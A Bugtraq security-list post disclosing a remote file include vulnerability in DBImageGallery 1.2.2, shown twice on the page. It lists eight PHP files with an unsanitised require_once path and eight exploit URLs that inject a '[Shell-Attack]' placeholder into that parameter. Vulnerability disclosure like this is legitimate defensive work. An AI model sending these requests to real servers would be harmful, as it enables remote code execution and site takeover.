Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Remote File Include In DBImageGallery
Mar 02 2007 01:30PM
RaeD Hasadya (raed bsdmail com)
Remote File Include In DBImageGallery 1.2.2
Discovered By : Hasadya Raed
Contact Me : RaeD (at) BsdMail (dot) Com [email concealed]
Download Script :
http://www.dbscripts.net/download/?file=1
B.Files:
admin/attributes.php -> require_once $donsimg_base_path
admin/images.php -> require_once $donsimg_base_path
admin/scan.php -> require_once $donsimg_base_path
includes/attributes.php -> require_once $donsimg_base_path
includes/db_utils.php -> require_once $donsimg_base_path
includes/images.php -> require_once $donsimg_base_path
includes/utils.php -> require_once $donsimg_base_path
includes/values.php -> require_once $donsimg_base_path
Exploits :
http://www.victim.com/path/admin/attributes.php?donsimg_base_path=[Shell
-Attack]
http://www.victim.com/path/admin/images.php?donsimg_base_path=[Shell-Att
ack]
http://www.victim.com/path/admin/scan.php?donsimg_base_path=[Shell-Attac
k]
http://www.victim.com/path/includes/attributes.php?donsimg_base_path=[Sh
ell-Attack]
http://www.victim.com/path/includes/db_utils.php?donsimg_base_path=[Shel
l-Attack]
http://www.victim.com/path/includes/images.php?donsimg_base_path=[Shell-
Attack]
http://www.victim.com/path/includes/utils.php?donsimg_base_path=[Shell-A
ttack]
http://www.victim.com/path/includes/values.php?donsimg_base_path=[Shell-
Attack]
--
_______________________________________________
Get your free email from http://bsdmail.com
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Discovered By : Hasadya Raed
Contact Me : RaeD (at) BsdMail (dot) Com [email concealed]
Download Script :
http://www.dbscripts.net/download/?file=1
B.Files:
admin/attributes.php -> require_once $donsimg_base_path
admin/images.php -> require_once $donsimg_base_path
admin/scan.php -> require_once $donsimg_base_path
includes/attributes.php -> require_once $donsimg_base_path
includes/db_utils.php -> require_once $donsimg_base_path
includes/images.php -> require_once $donsimg_base_path
includes/utils.php -> require_once $donsimg_base_path
includes/values.php -> require_once $donsimg_base_path
Exploits :
http://www.victim.com/path/admin/attributes.php?donsimg_base_path=[Shell
-Attack]
http://www.victim.com/path/admin/images.php?donsimg_base_path=[Shell-Att
ack]
http://www.victim.com/path/admin/scan.php?donsimg_base_path=[Shell-Attac
k]
http://www.victim.com/path/includes/attributes.php?donsimg_base_path=[Sh
ell-Attack]
http://www.victim.com/path/includes/db_utils.php?donsimg_base_path=[Shel
l-Attack]
http://www.victim.com/path/includes/images.php?donsimg_base_path=[Shell-
Attack]
http://www.victim.com/path/includes/utils.php?donsimg_base_path=[Shell-A
ttack]
http://www.victim.com/path/includes/values.php?donsimg_base_path=[Shell-
Attack]
--
_______________________________________________
Get your free email from http://bsdmail.com
[ reply ]